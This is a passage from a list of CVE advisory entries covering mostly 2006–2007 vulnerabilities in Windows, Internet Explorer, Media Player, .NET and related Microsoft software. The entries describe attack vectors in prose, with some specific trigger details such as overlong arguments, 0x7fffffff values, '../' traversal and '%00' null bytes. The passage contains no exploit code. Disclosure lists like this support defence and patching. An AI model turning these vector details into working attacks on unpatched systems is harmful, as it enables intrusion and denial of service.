MC-filename. NOTE: this issue has been disputed by a reliable third party who states that the compiler is not a privileged program, so privilege boundaries cannot be crossed. [CVE-2007-0069] Unspecified vulnerability in the kernel in Microsoft Windows XP SP2, Server 2003, and Vista allows remote attackers to cause a denial of service (CPU consumption) and possibly execute arbitrary code via crafted (1) IGMPv3 and (2) MLDv2 packets that trigger memory corruption, aka "Windows Kernel TCP/IP/IGMPv3 and MLDv2 Vulnerability." [CVE-2007-0066] The kernel in Microsoft Windows 2000 SP4, XP SP2, and Server 2003, when ICMP Router Discovery Protocol (RDP) is enabled, allows remote attackers to cause a denial of service via fragmented router advertisement ICMP packets that trigger an out-of-bounds read, aka "Windows Kernel TCP/IP/ICMP Vulnerability." [CVE-2007-0065] Heap-based buffer overflow in Object Linking and Embedding (OLE) Automation in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, Vista, Office 2004 for Mac, and Visual basic 6.0 SP6 allows remote attackers to execute arbitrary code via a crafted script request. [CVE-2007-0064] Heap-based buffer overflow in Windows Media Format Runtime 7.1, 9, 9.5, 9.5 x64 Edition, 11, and Windows Media Services 9.1 for Microsoft Windows 2000, XP, Server 2003, and Vista allows user-assisted remote attackers to execute arbitrary code via a crafted Advanced Systems Format (ASF) file. [CVE-2007-0045] Multiple cross-site scripting (XSS) vulnerabilities in Adobe Acrobat Reader Plugin before 8.0.0, and possibly the plugin distributed with Adobe Reader 7.x before 7.1.4, 8.x before 8.1.7, and 9.x before 9.2, for Mozilla Firefox, Microsoft Internet Explorer 6 SP1, Google Chrome, Opera 8.5.4 build 770, and Opera 9.10.8679 on Windows allow remote attackers to inject arbitrary JavaScript and conduct other attacks via a .pdf URL with a javascript: or res: URI with (1) FDF, (2) XML, and (3) XFDF AJAX parameters, or (4) an arbitrarily named name=URI anchor identifier, aka "Universal XSS (UXSS)." [CVE-2007-0043] The Just In Time (JIT) Compiler service in Microsoft .NET Framework 1.0, 1.1, and 2.0 for Windows 2000, XP, Server 2003, and Vista allows user-assisted remote attackers to execute arbitrary code via unspecified vectors involving an "unchecked buffer," probably a buffer overflow, aka ".NET JIT Compiler Vulnerability". [CVE-2007-0042] Interpretation conflict in ASP.NET in Microsoft .NET Framework 1.0, 1.1, and 2.0 for Windows 2000, XP, Server 2003, and Vista allows remote attackers to access configuration files and obtain sensitive information, and possibly bypass security mechanisms that try to constrain the final substring of a string, via %00 characters, related to use of %00 as a string terminator within POSIX functions but a data character within .NET strings, aka "Null Byte Termination Vulnerability." [CVE-2007-0041] The PE Loader service in Microsoft .NET Framework 1.0, 1.1, and 2.0 for Windows 2000, XP, Server 2003, and Vista allows remote attackers to execute arbitrary code via unspecified vectors involving an "unchecked buffer" and unvalidated message lengths, probably a buffer overflow. [CVE-2007-0040] The LDAP service in Windows Active Directory in Microsoft Windows 2000 Server SP4, Server 2003 SP1 and SP2, Server 2003 x64 Edition and SP2, and Server 2003 for Itanium-based Systems SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted LDAP request with an unspecified number of "convertible attributes." [CVE-2007-0038] Stack-based buffer overflow in the animated cursor code in Microsoft Windows 2000 SP4 through Vista allows remote attackers to execute arbitrary code or cause a denial of service (persistent reboot) via a large length value in the second (or later) anih block of a RIFF .ANI, cur, or .ico file, which results in memory corruption when processing cursors, animated cursors, and icons, a variant of CVE-2005-0416, as originally demonstrated using Internet Explorer 6 and 7. NOTE: this might be a duplicate of CVE-2007-1765 [CVE-2007-0026] The OLE Dialog component in Microsoft Windows 2000 SP4, XP SP2, and 2003 SP1 allows user-assisted remote attackers to execute arbitrary code via an RTF file with a malformed OLE object that triggers memory corruption. [CVE-2007-0025] The MFC component in Microsoft Windows 2000 SP4, XP SP2, and 2003 SP1 and Visual Studio .NET 2000, 2002 SP1, 2003, and 2003 SP1 allows user-assisted remote attackers to execute arbitrary code via an RTF file with a malformed OLE object that triggers memory corruption. NOTE: this might be due to a stack-based buffer overflow in the AfxOleSetEditMenu function in MFC42u.dll. [CVE-2007-0024] Integer overflow in the Vector Markup Language (VML) implementation (vgx.dll) in Microsoft Internet Explorer 5.01, 6, and 7 on Windows 2000 SP4, XP SP2, Server 2003, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a crafted web page that contains unspecified integer properties that cause insufficient memory allocation and trigger a buffer overflow, aka the "VML Buffer Overrun Vulnerability." [CVE-2006-7210] Microsoft Windows 2000, XP, and Server 2003 allows remote attackers to cause a denial of service (cpu consumption) via a PNG image with crafted (1) Width and (2) Height values in the IHDR block. [CVE-2006-7206] Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) by creating a ADODB.Recordset object and making a series of calls to the NextRecordset method with a long string argument, which causes an "invalid memory access" in the SysFreeString function, a different issue than CVE-2006-3510 and CVE-2006-3899. [CVE-2006-7066] Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) by creating an object inside an iframe, deleting the frame by setting its location.href to about:blank, then accessing a property of the object within the deleted frame, which triggers a NULL pointer dereference. NOTE: it was later reported that 7.0.6000.16473 and earlier are also affected. [CVE-2006-6902] Unspecified vulnerability in the Bluetooth stack in Microsoft Windows Mobile Pocket PC edition allows remote attackers to gain administrative access (aka Remote Root) via unspecified vectors. [CVE-2006-6901] Unspecified vulnerability in the Bluetooth stack in Microsoft Windows allows remote attackers to gain administrative access (aka Remote Root) via unspecified vectors. [CVE-2006-6797] The Client Server Run-Time Subsystem (CSRSS) in Microsoft Windows allows local users to cause a denial of service (crash) or read arbitrary memory from csrss.exe via crafted arguments to the NtRaiseHardError function with status 0x50000018, a different vulnerability than CVE-2006-6696. [CVE-2006-6753] Event Viewer (eventvwr.exe) in Microsoft Windows does not properly display log data that contains '%' (percent) characters, which might make it impossible to use Event Viewer to determine the actual data that triggered an event, and might produce long strings that are not properly handled by certain processes that rely on Event Viewer. [CVE-2006-6696] Double free vulnerability in Microsoft Windows 2000, XP, 2003, and Vista allows local users to gain privileges by calling the MessageBox function with a MB_SERVICE_NOTIFICATION message with crafted data, which sends a HardError message to Client/Server Runtime Server Subsystem (CSRSS) process, which is not properly handled when invoking the UserHardError and GetHardErrorText functions in WINSRV.DLL. [CVE-2006-6659] The Microsoft Office Outlook Recipient ActiveX control (ole32.dll) in Windows XP SP2 allows remote attackers to cause a denial of service (Internet Explorer 7 hang) via crafted HTML. [CVE-2006-6602] explorer.exe in Windows Explorer 6.00.2900.2180 in Microsoft Windows XP SP2 allows user-assisted remote attackers to cause a denial of service via a crafted WMV file. [CVE-2006-6601] Windows Media Player 10.00.00.4036 in Microsoft Windows XP SP2 allows user-assisted remote attackers to cause a denial of service via a .MID (MIDI) file with a malformed header chunk without any track chunks, possibly involving (1) number of tracks of (2) time division fields that are set to 0. [CVE-2006-6579] Microsoft Windows XP has weak permissions (FILE_WRITE_DATA and FILE_READ_DATA for Everyone) for %WINDIR%\pchealth\ERRORREP\QHEADLES, which allows local users to write and read files in this folder, as demonstrated by an ASP shell that has write access by IWAM_machine and read access by IUSR_Machine. [CVE-2006-6252] Microsoft Windows Live Messenger 8.0 and earlier, when gestual emoticons are enabled, allows remote attackers to cause a denial of service (CPU consumption) via a long string composed of ":D" sequences, which are interpreted as emoticons. [CVE-2006-6134] Heap-based buffer overflow in the WMCheckURLScheme function in WMVCORE.DLL in Microsoft Windows Media Player (WMP) 10.00.00.4036 on Windows XP SP2, Server 2003, and Server 2003 SP1 allows remote attackers to cause a denial of service (application crash) and execute arbitrary code via a long HREF attribute, using an unrecognized protocol, in a REF element in an ASX PlayList file. [CVE-2006-5758] The Graphics Rendering Engine in Microsoft Windows 2000 through 2000 SP4 and Windows XP through SP2 maps GDI Kernel structures on a global shared memory section that is mapped with read-only permissions, but can be remapped by other processes as read-write, which allows local users to cause a denial of service (memory corruption and crash) and gain privileges by modifying the kernel structures. [CVE-2006-5745] Unspecified vulnerability in the setRequestHeader method in the XMLHTTP (XML HTTP) ActiveX Control 4.0 in Microsoft XML Core Services 4.0 on Windows, when accessed by Internet Explorer, allows remote attackers to execute arbitrary code via crafted arguments that lead to memory corruption, a different vulnerability than CVE-2006-4685. NOTE: some of these details are obtained from third party information. [CVE-2006-5614] Microsoft Windows NAT Helper Components (ipnathlp.dll) on Windows XP SP2, when Internet Connection Sharing is enabled, allows remote attackers to cause a denial of service (svchost.exe crash) via a malformed DNS query, which results in a null pointer dereference. [CVE-2006-5586] The Graphics Rendering Engine in Microsoft Windows 2000 SP4 and XP SP2 allows local users to gain privileges via "invalid application window sizes" in layered application windows, aka the "GDI Invalid Window Size Elevation of Privilege Vulnerability." [CVE-2006-5585] The Client-Server Run-time Subsystem in Microsoft Windows XP SP2 and Server 2003 allows local users to gain privileges via a crafted file manifest within an application, aka "File Manifest Corruption Vulnerability." [CVE-2006-5584] The Remote Installation Service (RIS) in Microsoft Windows 2000 SP4 uses a TFTP server that allows anonymous access, which allows remote attackers to upload and overwrite arbitrary files to gain privileges on systems that use RIS. [CVE-2006-5583] Buffer overflow in the SNMP Service in Microsoft Windows 2000 SP4, XP SP2, Server 2003, Server 2003 SP1, and possibly other versions allows remote attackers to execute arbitrary code via a crafted SNMP packet, aka "SNMP Memory Corruption Vulnerability." [CVE-2006-5448] The drmstor.dll ActiveX object in Microsoft Windows Digital Rights Management System (DRM) allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long parameter to the StoreLicense function, which triggers "memory corruption" and possibly a buffer overflow. [CVE-2006-5270] Integer overflow in the Microsoft Malware Protection Engine (mpengine.dll), as used by Windows Live OneCare, Antigen, Defender, and Forefront Security, allows user-assisted remote attackers to execute arbitrary code via a crafted PDF file. [CVE-2006-5028] Directory traversal vulnerability in filemanager/filemanager.php in SWsoft Plesk 7.5 Reload and Plesk 7.6 for Microsoft Windows allows remote attackers to list arbitrary directories via a ../ (dot dot slash) in the file parameter in a chdir action. [CVE-2006-4868] Stack-based buffer overflow in the Vector Graphics Rendering engine (vgx.dll), as used in Microsoft Outlook and Internet Explorer 6.0 on Windows XP SP2, and possibly other versions, allows remote attackers to execute arbitrary code via a Vector Markup Language (VML) file with a long fill parameter within a rect tag. [CVE-2006-4702] Buffer overflow in the Windows Media Format Runtime in Microsoft Windows Media Player (WMP) 6.4 and Windows XP SP2, Server 2003, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a crafted Advanced Systems Format (ASF) file. [CVE-2006-4696] Unspecified vulnerability in the Server service in Microsoft Windows 2000 SP4, Server 2003 SP1 and earlier, and XP SP2 and earlier allows remote attackers to execute arbitrary code via a crafted packet, aka "SMB Rename Vulnerability." [CVE-2006-4694] Unspecified vulnerability in PowerPoint in Microsoft Office 2000, Office XP and Office 2003 allows user-assisted attackers to execute arbitrary code via a crafted record in a PPT file, as exploited by malware such as Exploit:Win32/Controlppt.W, Exploit:Win32/Controlppt.X, and Exploit-PPT.d/Trojan.PPDropper.F. NOTE: it has been reported that the attack vector involves SlideShowWindows.View.GotoNamedShow. [CVE-2006-4692] Argument injection vulnerability in the Windows Object Packager (packager.exe) in Microsoft Windows XP SP1 and SP2 and Server 2003 SP1 and earlier allows remote user-assisted attackers to execute arbitrary commands via a crafted file with a "/" (slash) character in the filename of the Command Line property, followed by a valid file extension, which causes the command before the slash to be executed, aka "Object Packager Dialogue Spoofing Vulnerability." [CVE-2006-4689] Unspecified vulnerability in the driver for the Client Service for NetWare (CSNW) in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 up to SP1 allows remote attackers to cause a denial of service (hang and reboot) via has unknown attack vectors, aka "NetWare Driver Denial of Service Vulnerability." [CVE-2006-4688] Buffer overflow in Client Service for NetWare (CSNW) in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 up to SP1 allows remote attackers to execute arbitrary code via crafted messages, aka "Client Service for NetWare Memory Corruption Vulnerability." [CVE-2006-4495] Microsoft Internet Explorer allows remote attackers to cause a denial of service (memory corruption) and possibly execute arbitrary code by instantiating certain Windows 2000 ActiveX COM Objects including (1) ciodm.dll, (2) myinfo.dll, (3) msdxm.ocx, and (4) creator.dll. [CVE-2006-4219] The Terminal Services COM object (tsuserex.dll) allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code by instantiating it as an ActiveX object in Internet Explorer 6.0 SP1 on Microsoft Windows 2003 EE SP1 CN. [CVE-2006-4138] Multiple unspecified vulnerabilities in Microsoft Windows Help File viewer (winhlp32.exe) allow user-assisted attackers to execute arbitrary code via crafted HLP files. [CVE-2006-4128] Multiple heap-based buffer overflows in Symantec VERITAS Backup Exec for Netware Server Remote Agent for Windows Server 9.1 and 9.2 (all builds), Backup Exec Continuous Protection Server Remote Agent for Windows Server 10.1 (builds 10.1.325.6301, 10.1.326.1401, 10.1.326.2501, 10.1.326.3301, and 10.1.327.401), and Backup Exec for Windows Server and Remote Agent 9.1 (build 9.1.4691), 10.0 (builds 10.0.5484 and 10.0.5520), and 10.1 (build 10.1.5629) allow remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a crafted RPC message. [CVE-2006-4071] Sign extension vulnerability in the createBrushIndirect function in the GDI library (gdi32.dll) in Microsoft Windows XP, Server 2003, and possibly other versions, allows user-assisted attackers to cause a denial of service (application crash) via a crafted WMF file. [CVE-2006-4066] The Graphical Device Interface Plus library (gdiplus.dll) in Microsoft Windows XP SP2 allows context-dependent attackers to cause a denial of service (application crash) via certain images that trigger a divide-by-zero error, as demonstrated by a (1) .ico file, (2) .png file that crashes MSN Messenger, and (3) .jpg file that crashes Internet Explorer. NOTE: another researcher has not been able to reproduce this issue. [CVE-2006-3992] Unspecified vulnerability in the Centrino (1) w22n50.sys, (2) w22n51.sys, (3) w29n50.sys, and (4) w29n51.sys Microsoft Windows drivers for Intel 2200BG and 2915ABG PRO/Wireless Network Connection before 10.5 with driver 9.0.4.16 allows remote attackers to execute arbitrary code via certain frames that trigger memory corruption. [CVE-2006-3944] Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) via a (1) Forms.ListBox.1 or (2) Forms.ListBox.1 object with the ListWidth property set to (a) 0x7fffffff, which triggers an integer overflow exception, or to (b) 0x7ffffffe, which triggers a null dereference. [CVE-2006-3943] Stack-based buffer overflow in NDFXArtEffects in Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) via long (1) RGBExtraColor, (2) RGBForeColor, and (3) RGBBackColor properties. [CVE-2006-3942] The server driver (srv.sys) in Microsoft Windows NT 4.0, 2000, XP, and Server 2003 allows remote attackers to cause a denial of service (system crash) via an SMB_COM_TRANSACTION SMB message that contains a string without null character termination, which leads to a NULL dereference in the ExecuteTransaction function, possibly related to an "SMB PIPE," aka the "Mailslot DOS" vulnerability. NOTE: the name "Mailslot DOS" was derived from incomplete initial research [CVE-2006-3915] Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) by iterating over any native function, as demonstrated with the window.alert function, which triggers a null dereference. [CVE-2006-3899] Microsoft Internet Explorer 6.0 on Windows XP SP2 allows remote attackers to cause a denial of service (application crash) by calling the stringToBinary function of the CEnroll.CEnroll.2 ActiveX object with a long second argument, which triggers an invalid memory access inside the SysAllocStringLen function. [CVE-2006-3898] Microsoft Internet Explorer 6.0 on Windows XP SP2 allows remote attackers to cause a denial of service (application crash) by calling the Click method of the Internet.HHCtrl.1 ActiveX object before initializing the URL, which triggers a null dereference. [CVE-2006-3897] Stack overflow in Microsoft Internet Explorer 6 on Windows 2000 allows remote attackers to cause a denial of service (application crash) by creating an NMSA.ASFSourceMediaDescription.1 ActiveX object with a long dispValue property. [CVE-2006-3880] DISPUTED Microsoft Windows NT 4.0, Windows 2000, Windows XP, and Windows Small Business Server 2003 allow remote attackers to cause a denial of service (IP stack hang) via a continuous stream of packets on TCP port 135 that have incorrect TCP header checksums and random numbers in certain TCP header fields, as demonstrated by the Achilles Windows Attack Tool. NOTE: the researcher reports that the Microsoft Security Response Center has stated "Our investigation which has included code review, review of the TCPDump, and attempts on reproing the issue on multiple fresh installs of various Windows Operating Systems have all resulted in non confirmation." [CVE-2006-3873] Heap-based buffer overflow in URLMON.DLL in Microsoft Internet Explorer 6 SP1 on Windows 2000 and XP SP1, with versions the MS06-042 patch before 20060912, allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a long URL in a GZIP-encoded website that was the target of an HTTP redirect, due to an incomplete fix for CVE-2006-3869. [CVE-2006-3869] Heap-based buffer overflow in URLMON.DLL in Microsoft Internet Explorer 6 SP1 on Windows 2000 and XP SP1, with versions the MS06-042 patch before 20060824, allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a long URL on a website that uses HTTP 1.1 compression. [CVE-2006-3730] Integer overflow in Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a 0x7fffffff argument to the setSlice method on a WebViewFolderIcon ActiveX object, which leads to an invalid memory copy. [CVE-2006-3648] Unspecified vulnerability in Microsoft Windows 2000 SP4, XP SP1 and SP2, Server 2003 and 2003 SP1, allows remote attackers to execute arbitrary code via unspecified vectors involving unhandled exceptions, memory resident applications, and incorrectly "unloading chained exception." [CVE-2006-3643] Cross-site scripting (XSS) vulnerability in Internet Explorer 5.01 and 6 in Microsoft Windows 2000 SP4 permits access to local "HTML-embedded resource files" in the Microsoft Management Console (MMC) library, which allows remote authenticated users to execute arbitrary commands, aka "MMC Redirect Cross-Site Scripting Vulnerability." [CVE-2006-3510] The Remote Data Service Object (RDS.DataControl) in Microsoft Internet Explorer 6 on Windows 2000 allows remote attackers to cause a denial of service (crash) via a series of operations that result in an invalid length calculation when using SysAllocStringLen, then triggers a buffer over-read. [CVE-2006-3471] Microsoft Internet Explorer 6 on Windows XP allows remote attackers to cause a denial of service (crash) via a table with a frameset as a child, which triggers a null dereference, as demonstrated using the appendChild method. [CVE-2006-3448] Buffer overflow in the Step-by-Step Interactive Training in Microsoft Windows 2000 SP4, XP SP2 and Professional, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a long Syllabus string in crafted bookmark link files (cbo, cbl, or .cbm), a different issue than CVE-2005-1212. [CVE-2006-3445] Integer overflow in the ReadWideString function in agentdpv.dll in Microsoft Agent on Microsoft Windows 2000 SP4, XP SP2, and Server 2003 up to SP1 allows remote attackers to execute arbitrary code via a large length value in an .ACF file, which results in a heap-based buffer overflow. [CVE-2006-3444] Unspecified vulnerability in the kernel in Microsoft Windows 2000 SP4, probably a buffer overflow, allows local users to obtain privileges via unspecified vectors involving an "unchecked buffer." [CVE-2006-3443] Untrusted search path vulnerability in Winlogon in Microsoft Windows 2000 SP4, when SafeDllSearchMode is disabled, allows local users to gain privileges via a malicious DLL in the UserProfile directory, aka "User Profile Elevation of Privilege Vulnerability." [CVE-2006-3442] Unspecified vulnerability in Pragmatic General Multicast (PGM) in Microsoft Windows XP SP2 and earlier allows remote attackers to execute arbitrary code via a crafted multicast message. [CVE-2006-3441] Buffer overflow in the DNS Client service in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a crafted record response. NOTE: while MS06-041 implies that there is a single issue, there are multiple vectors, and likely multiple vulnerabilities, related to (1) a heap-based buffer overflow in a DNS server response to the client, (2) a DNS server response with malformed ATMA records, and (3) a length miscalculation in TXT, HINFO, X25, and ISDN records. [CVE-2006-3440] Buffer overflow in the Winsock API in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers to execute arbitrary code via unknown vectors, aka "Winsock Hostname Vulnerability." [CVE-2006-3209] DISPUTED The Task scheduler (at.exe) on Microsoft Windows XP spawns each scheduled process with SYSTEM permissions, which allows local users to gain privileges. NOTE: this issue has been disputed by third parties, who state that the Task scheduler is limited to the Administrators group by default upon installation. [CVE-2006-2766] Buffer overflow in INETCOMM.DLL, as used in Microsoft Internet Explorer 6.0 through 6.0 SP2, Windows Explorer, Outlook Express 6, and possibly other programs, allows remote user-assisted attackers to cause a denial of service (application crash) via a long mhtml URI in the URL value in a URL file. [CVE-2006-2386] Unspecified vulnerability in Microsoft Outlook Express 6 and earlier allows remote attackers to execute arbitrary code via a crafted contact record in a Windows Address Book (WAB) file. [CVE-2006-2379] Buffer overflow in the TCP/IP Protocol driver in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier allows remote attackers to execute arbitrary code via unknown vectors related to IP source routing. [CVE-2006-2378] Buffer overflow in the ART Image Rendering component (jgdw400.dll) in Microsoft Windows XP SP1 and Sp2, Server 2003 SP1 and earlier, and Windows 98 and Me allows remote attackers to execute arbitrary code via a crafted ART image that causes heap corruption. [CVE-2006-2376] Integer overflow in the PolyPolygon function in Graphics Rendering Engine on Microsoft Windows 98 and Me allows remote attackers to execute arbitrary code via a Windows Metafile (WMF) or EMF image with a sum of entries in the vertext counts array and number of polygons that triggers a heap-based buffer overflow. [CVE-2006-2374] The Server Message Block (SMB) driver (MRXSMB.SYS) in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier allows local users to cause a denial of service (hang) by calling the MrxSmbCscIoctlCloseForCopyChunk with the file handle of the shadow device, which results in a deadlock, aka the "SMB Invalid Handle Vulnerability." [CVE-2006-2373] The Server Message Block (SMB) driver (MRXSMB.SYS) in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier allows local users to execute arbitrary code by calling the MrxSmbCscIoctlOpenForCopyChunk function with the METHOD_NEITHER method flag and an arbitrary address, possibly for kernel memory, aka the "SMB Driver Elevation of Privilege Vulnerability." [CVE-2006-2372] Buffer overflow in the DHCP Client service for Microsoft Windows 2000 SP4, Windows XP SP1 and SP2, and Server 2003 up to SP1 allows remote attackers to execute arbitrary code via a crafted DHCP response. [CVE-2006-2334] The RtlDosPathNameToNtPathName_U API function in NTDLL.DLL in Microsoft Windows 2000 SP4 and XP SP2 does not properly convert DOS style paths with trailing spaces into NT style paths, which allows context-dependent attackers to create files that cannot be accessed through the expected DOS path or prevent access to other similarly named files in the same directory, which prevents those files from being detected or disinfected by certain anti-virus and anti-spyware software. [CVE-2006-2218] Unspecified vulnerability in Internet Explorer 6.0 on Microsoft Windows XP SP2 allows remote attackers to execute arbitrary code via "exceptional conditions" that trigger memory corruption, as demonstrated using an exception handler and nested object tags, a variant of CVE-2006-1992. [CVE-2006-2094] Microsoft Internet Explorer before Windows XP Service Pack 2 and Windows Server 2003 Service Pack 1, when Prompt is configured in Security Settings, uses modal dialogs to verify that a user wishes to run an ActiveX control or perform other risky actions, which allows user-assisted remote attackers to construct a race condition that tricks a user into clicking an object or pressing keys that are actually applied to a "Yes" approval for executing the control. [CVE-2006-2056] Argument injection vulnerability in Internet Explorer 6 for Windows XP SP2 allows user-assisted remote attackers to modify command line arguments to an invoked mail client via " (double quote) characters in a mailto: scheme handler, as demonstrated by launching Microsoft Outlook with an arbitrary filename as an attachment. NOTE: it is not clear whether this issue is implementation-specific or a problem in the Microsoft API. [CVE-2006-1654] Directory traversal vulnerability in the HP Color LaserJet 2500 Toolbox and Color LaserJet 4600 Toolbox on Microsoft Windows before 20060402 allows remote attackers to read arbitrary files via a .. (dot dot) in an HTTP GET request to TCP port 5225. [CVE-2006-1651] DISPUTED Microsoft ISA Server 2004 allows remote attackers to bypass certain filtering rules, including ones for (1) ICMP and (2) TCP, via IPv6 packets. NOTE: An established researcher has disputed this issue, saying that "Neither ISA Server 2004 nor Windows 2003 Basic Firewall support IPv6 filtering ... This is different network protocol." [CVE-2006-1591] Heap-based buffer overflow in Microsoft Windows Help winhlp32.exe allows user-assisted attackers to execute arbitrary code via crafted embedded image data in a .hlp file. [CVE-2006-1510] Buffer overflow in calloc.c in the Microsoft Windows XP SP2 ntdll.dll system library, when used by the ILDASM disassembler in the Microsoft .NET 1.0 and 1.1 SDK, might allow user-assisted attackers to execute arbitrary code via a crafted .dll file with a large static method. [CVE-2006-1476] Windows Firewall in Microsoft Windows XP SP2 produces incorrect application block alerts when the application filename is ".exe" (with no characters before the "."), which might allow local user-assisted users to trick a user into unblocking a Trojan horse program, as demonstrated by a malicious ".exe" program in a folder named "Internet Explorer," which triggers a question about whether to unblock the "Internet Explorer" program. [CVE-2006-1475] Windows Firewall in Microsoft Windows XP SP2 does not produce application alerts when an application is executed using the NTFS Alternate Data Streams (ADS) filename:stream syntax, which might allow local users to launch a Trojan horse attack in which the victim does not obtain the alert that Windows Firewall would have produced for a non-ADS file. [CVE-2006-1315] The Server Service (SRV.SYS driver) in Microsoft Windows 2000 SP4, XP SP1 and SP2, Server 2003 up to SP1, and other products, allows remote attackers to obtain sensitive information via crafted requests that leak information in SMB buffers, which are not properly initialized, aka "SMB Information Disclosure Vulnerability." [CVE-2006-1314] Heap-based buffer overflow in the Server Service (SRV.SYS driver) in Microsoft Windows 2000 SP4, XP SP1 and SP2, Server 2003 up to SP1, and other products, allows remote attackers to execute arbitrary code via crafted first-class Mailslot messages that triggers memory corruption and bypasses size restrictions on second-class Mailslot messages. [CVE-2006-1313] Microsoft JScript 5.1, 5.5, and 5.6 on Windows 2000 SP4, and 5.6 on Windows XP, Server 2003, Windows 98 and Windows Me, will "release objects early" in certain cases, which results in memory corruption and allows remote attackers to execute arbitrary code. [CVE-2006-1311] The RichEdit component in Microsoft Windows 2000 SP4, XP SP2, and 2003 SP1 [CVE-2006-1300] Microsoft .NET framework 2.0 (ASP.NET) in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 up to SP1 allows remote attackers to bypass access restrictions via unspecified "URL paths" that can access Application Folder objects "explicitly by name." [CVE-2006-1184] Microsoft Distributed Transaction Coordinator (MSDTC) for Windows NT 4.0, 2000 SP4, XP SP1 and SP2, and Server 2003 allows remote attackers to cause a denial of service (crash) via a BuildContextW request with a large (1) UuidString or (2) GuidIn of a certain length, which causes an out-of-range memory access, aka the MSDTC Denial of Service Vulnerability. NOTE: this is a variant of CVE-2005-2119. [CVE-2006-0988] The default configuration of the DNS Server service on Windows Server 2003 and Windows 2000, and the Microsoft DNS Server service on Windows NT 4.0, allows recursive queries and provides additional delegation information to arbitrary IP addresses, which allows remote attackers to cause a denial of service (traffic amplification) via DNS queries with spoofed source IP addresses. [CVE-2006-0753] Memory leak in Microsoft Internet Explorer 6 for Windows XP Service Pack 2 allows remote attackers to cause a denial of service (memory consumption) via JavaScript that uses setInterval to repeatedly call a function to set the value of window.status. [CVE-2006-0561] Cisco Secure Access Control Server (ACS) 3.x for Windows stores ACS administrator passwords and the master key in the registry with insecure permissions, which allows local users and remote administrators to decrypt the passwords by using Microsoft's cryptographic API functions to obtain the plaintext version of the master key. [CVE-2006-0143] Microsoft Windows Graphics Rendering Engine (GRE) allows remote attackers to corrupt memory and cause a denial of service (crash) via a WMF file containing (1) ExtCreateRegion or (2) ExtEscape function calls with arguments with inconsistent lengths. [CVE-2006-0032] Cross-site scripting (XSS) vulnerability in the Indexing Service in Microsoft Windows 2000, XP, and Server 2003, when the Encoding option is set to Auto Select, allows remote attackers to inject arbitrary web script or HTML via a UTF-7 encoded URL, which is injected into an error message whose charset is set to UTF-7. [CVE-2006-0025] Stack-based buffer overflow in Microsoft Windows Media Player 9 and 10 allows remote attackers to execute arbitrary code via a PNG image with a large chunk size. [CVE-2006-0023] Microsoft Windows XP SP1 and SP2 before August 2004, and possibly other operating systems and versions, uses insecure default ACLs that allow the Authenticated Users group to gain privileges by modifying critical configuration information for the (1) Simple Service Discovery Protocol (SSDP), (2) Universal Plug and Play Device Host (UPnP), (3) NetBT, (4) SCardSvr, (5) DHCP, and (6) DnsCache services, aka "Permissive Windows Services DACLs." NOTE: the NetBT, SCardSvr, DHCP, DnsCache already require privileged access to exploit. [CVE-2006-0021] Microsoft Windows XP SP1 and SP2, and Server 2003 up to SP1, allows remote attackers to cause a denial of service (hang) via an IGMP packet with an invalid IP option, aka the "IGMP v3 DoS Vulnerability." [CVE-2006-0020] An unspecified Microsoft WMF parsing application, as used in Internet Explorer 5.01 SP4 on Windows 2000 SP4, and 5.5 SP2 on Windows Millennium, and possibly other versions, allows attackers to cause a denial of service (crash) and possibly execute code via a crafted WMF file with a manipulated WMF header size, possibly involving an integer overflow, a different vulnerability than CVE-2005-4560, and aka "WMF Image Parsing Memory Corruption Vulnerability." [CVE-2006-0014] Buffer overflow in Microsoft Outlook Express 5.5 and 6 allows remote attackers to execute arbitrary code via a crafted Windows Address Book (WAB) file containing "certain Unicode strings" and modified length values. [CVE-2006-0012] Unspecified vulnerability in Windows Explorer in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers to execute arbitrary code via attack vectors involving COM objects and "crafted files and directories," aka the "Windows Shell Vulnerability." [CVE-2006-0010] Heap-based buffer overflow in T2EMBED.DLL in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 up to SP1, Windows 98, and Windows ME allows remote attackers to execute arbitrary code via an e-mail message or web page with a crafted Embedded Open Type (EOT) web font that triggers the overflow during decompression. [CVE-2006-0008] The ShellAbout API call in Korean Input Method Editor (IME) in Korean versions of Microsoft Windows XP SP1 and SP2, Windows Server 2003 up to SP1, and Office 2003, allows local users to gain privileges by launching the "shell about dialog box" and clicking the "End-User License Agreement" link, which executes Notepad with the privileges of the program that displays the about box. [CVE-2006-0006] Heap-based buffer overflow in the bitmap processing routine in Microsoft Windows Media Player 7.1 on Windows 2000 SP4, Media Player 9 on Windows 2000 SP4 and XP SP1, and Media Player 10 on XP SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted bitmap (.BMP) file that specifies a size of 0 but contains additional data. [CVE-2006-0005] Buffer overflow in the plug-in for Microsoft Windows Media Player (WMP) 9 and 10, when used in browsers other than Internet Explorer and set as the default application to handle media files, allows remote attackers to execute arbitrary code via HTML with an EMBED element containing a 